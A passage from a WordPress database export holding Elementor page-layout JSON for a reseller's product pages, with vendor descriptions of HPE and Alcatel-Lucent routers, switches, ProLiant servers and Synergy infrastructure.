\"right\":\"-1\",\"bottom\":\"-1\",\"left\":\"-1\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"d34cd1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Router<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Navigate more devices and simplify complex networks with intelligent management of open standards routing.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"304f150\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c7392b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"687ac33\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE FLexNetwork MSR95x Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2520\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-FLexNetwork-MSR95x-Router-Series.png\\\" alt=\\\"\\\" width=\\\"227\\\" height=\\\"171\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE MSR95x Router Series delivers high-performance, small branch routing in a single, cost-optimized form factor. Featuring integrated routing, switching, wireless, security, and voice with no additional licensing, boost your service delivery while simplifying the management of the corporate WAN. This series is flexible to deploy, with Zero Touch Provisioning and WAN options with LTE connectivity. With Comware v7 and fiber connections, the MSR95x also brings the performance and advanced services available on modular routers, such as IPS and high encryption, to a fixed port form factor.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e505229\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"65af13d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Alcatel-Lucent 7750 Service Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2521\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Alcatel-Lucent-7750-Service-Router-Series.png\\\" alt=\\\"\\\" width=\\\"229\\\" height=\\\"171\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The Alcatel-Lucent 7750 Service Router (SR) is a high-performance, multiservice, edge router designed for the concurrent support of advanced end user, business and mobile services on a common IP edge platform. Leveraging the Alcatel-Lucent in-house 400 Gb\\/s FP3 silicon technology, the 7750 SR enables a wide range of IP services for large enterprises and operators with exceptional performance, scale and service intelligence requirements. The 7750 SR utilizes the Alcatel-Lucent Service Router Operating System (SR OS) and supports service-aware management to enhance operational efficiency.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f17738e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"6eb923f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE FlexNetwork MSR93x Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2522\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-FlexNetwork-MSR93x-Router-Series.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"188\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE MSR93x Router Series delivers a high-performance small-branch router providing integrated routing, switching, security, SIP, 802.11n WLAN connectivity, and 4G LTE\\/3G in a single unit. With its Converged Infrastructure, it enables faster time to service and enhanced performance while simplifying your network through a single management screen and zero-touch deployment. The MSR93x increases flexibility and agility, delivering extensive connectivity capabilities in a compact, fixed form factor. The MSR93x is based on open standards for seamless integration within small-branch deployment.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4335c67\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"964afb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f168dc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"479f0a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"4f95a1f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3f5f006\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"fed6471\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4419ab2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"145a6dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5715260\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aeec70b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"50f2e58\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"99ae68c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Switches<\\/strong><\\/h2>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"823bc65\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f135ea8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f3e7bd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2523\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png\\\" alt=\\\"\\\" width=\\\"219\\\" height=\\\"165\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Altoline 6921 Switch Series is an x86-based OCP certified, open-networking, disaggregated family of low-latency 10GbE data center switches in a 1U form factor. Perfect for deployment in web-scale environments as a 10GbE server access switch; optimized for data center hot\\/cold aisle deployments with reversible airflow. Hardware support for VXLAN is ideal for deployment in multi-tenancy and overlay environments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2d0f78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"9dd34f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2524\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png\\\" alt=\\\"\\\" width=\\\"244\\\" height=\\\"184\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE Altoline 6960 Switch Series is an open-networking, disaggregated family of low latency 100\\/50\\/25GbE data center switches in a 1U form factor. Perfect for deployment in data center environments as 25GbE server access, or 100\\/50GbE spine switches. It is optimized for data center hot\\/cold aisle deployments with reversible airflow. The hardware support for VXLAN makes the Altoline 6960 ideal for deployment in multi-tenancy and overlay environments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5490442\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0fae7b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c4c6953\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7341cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"af59a7b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ac4e02\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"fa822d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"9\",\"right\":\"9\",\"bottom\":\"9\",\"left\":\"9\",\"isLinked\":true}},\"elements\":[{\"id\":\"608d110\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">To discover more, please click the button below or contact us to discuss your needs.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8619,3657,'_hide_footer',''),(8620,3657,'_hide_breadcrumb',''),(8617,3657,'_hide_page_title',''),(8618,3657,'_hide_header',''),(8430,3637,'_wp_page_template','template-fullwidth.php'),(8431,3637,'_elementor_edit_mode','builder'),(8432,3637,'_elementor_template_type','post'),(8433,3637,'_elementor_version','2.5.14'),(8434,3637,'_elementor_data','[{\"id\":\"e3617cd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"43a7986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2911cf1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>SERVER AND SYSTEM<\\/h2>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23469e8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7ff144f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"b99977c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Rack Servers<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Rack-optimized servers that modernize your data center by delivering performance, resiliency, and scalability for core business-to-business-critical workloads.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6146b0a\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"6698963\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"5ba2b0b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant DL325 Gen10 Server<\\/strong><\\/h4><hr \\/><p><img class=\\\"wp-image-2509 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-DL325-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"181\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Secure and versatile single socket (1P) 1U AMD EPYC\\u2122 based platform offers an exceptional balance of processor, memory and I\\/O for virtualization and data intensive workloads. With up to 32 cores, up to 16 DIMMs, 2 TB memory capacity and support for up to 10 NVMe drives, this server delivers 2P performance with 1P economics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"75d2a69\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"eb529d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant DL385 Gen10 Server<\\/strong><\\/h4><hr \\/><p><img class=\\\"wp-image-2511 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-DL385-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"181\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Hewlett Packard Enterprise is extending the worlds most secure industry standard servers to include the HPE ProLiant DL385 Gen10 server, utilizing the AMD EPYC 7000 Series processors. This platform has been designed with the security you need and the flexibility you require to accommodate demanding enterprise workloads. With up to 64 cores, up to 32 DIMMs, or 4 TB memory capacity and support for up to 24 NVMe drives, the HPE ProLiant DL385 Gen10 server delivers a low cost virtual machine (VM) with unprecedented security.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"54d4bd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"2796cf3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Apollo 6000 Chassis<\\/strong><\\/h4><hr \\/><p><img class=\\\"alignnone wp-image-2512 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Apollo-6000-Chassis.png\\\" alt=\\\"\\\" width=\\\"235\\\" height=\\\"160\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Apollo k6000 Chassis is designed with density optimization and HPC solution integration in mind to address these demands. The new modular, fully integrated, and highly flexible chassis is designed to hold the Hewlett Packard Enterprise Gen10 compute servers to fit your specific HPC workloads. It accommodates up to 24 HPE ProLiant XL230k Gen 10 Server trays, redundant power and cooling, Ethernet and high speed fabric switches to address various HPC workload needs. It is a performance optimized, air-cooled solution that fits in customer\\u2019s space limitations. This solution offers outstanding configuration flexibility, simplified administration and rack-scale efficiency that lowers the total cost of ownership (TCO) needed for mass scale HPC deployments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"40400cb\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"b8fcbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"2855b1a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"678fabe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"fa51356\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fc8f82c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"4c8fa09\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eecdb46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6841163\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a548724\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4d891af\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0ea549c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"136e88a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Tower Servers<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Lower costs, boost productivity and keep your small or midsize business running smoothly with servers that provide the options, tools and support you need.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7ecc5e6\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3e56afe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"75d320e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant ML110 Gen10 Server<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2513\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-ML110-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"226\\\" height=\\\"169\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE ProLiant ML110 Gen10 server is an enhanced tower with performance, expansion, and growth at an affordable price. It meets most small- and mid-sized businesses\\u2019 needs as well as accelerates your business compute. The ProLiant ML110 Gen10 is a single processor tower form factor that can also be placed in a rack server cabinet using 4.5U of rack space. It includes up to five PCIe slots with room to grow with eight large form factor (LFF) or 16 small form factor (SFF) disk drives. It provides six DDR4 DIMM slots supporting HPE DDR4 SmartMemory with a maximum capacity of 192 GB. The HPE ProLiant ML110 Gen10 server also offers optional redundant fan and redundant power supply to satisfy automatic fail-over needs, making this the ideal server for small- to mid-sized businesses and remote offices and branch offices.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"73a0f3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"20063ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant ML350 Gen10 Server<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2514\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-ML350-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"185\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE ProLiant ML350 Gen10 server delivers a secure dual-socket tower server with performance, expandability, and proven reliability making it the choice for expanding SMBs, remote offices of larger businesses, and enterprise data centers.\\u00a0The shorter re-designed rackable chassis with multiple upgrade options provides flexibility that can expand as your business needs grow. It supports 12 Gb\\/s SAS, NVMe SSD, embedded 4x1GbE NIC with a broad range of graphics and compute options.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6c3f725\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7af140c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1963cc6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"528c188\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d3d82f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"02284db\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"209c77a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"465decc\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9df2da5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"745e40c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d0111a7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>HPE Synergy<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Composable, software-defined infrastructure that speeds application delivery.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e25b4f6\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e344f90\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"e99ae7d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Synergy 12000 Frame<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2515\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Synergy-12000-Frame.png\\\" alt=\\\"\\\" width=\\\"226\\\" height=\\\"170\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE Synergy 12000 Frames are uniquely architected as Composable Infrastructure (CI) to match the powerful \'infrastructure-as-code\' capabilities of the HPE intelligent software architecture. Flexible access to compute, storage, and fabric resources allows for use and re-purposing. Linking multiple HPE Synergy Frames efficiently scales the infrastructure with a dedicated single view of the entire management network.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"62e0e2d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"40915d9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Synergy D3940 Storage Module<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2516\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Synergy-D3940-Storage-Module.png\\\" alt=\\\"\\\" width=\\\"222\\\" height=\\\"166\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Synergy D3940 Storage Module provides a fluid pool of storage resources for the Composable Infrastructure. Additional capacity for compute modules is easily provisioned and intelligently managed with integrated data services for availability and protection. The 40 SFF drive bays per storage module can be populated with 12 G SAS or 6 G SATA drives. Expand up to 4 storage modules in a single Synergy 12000 Frame for a total of 200 drives.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"70339e4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6a96ca1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"57c8c89\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da0887c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"57c273b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton 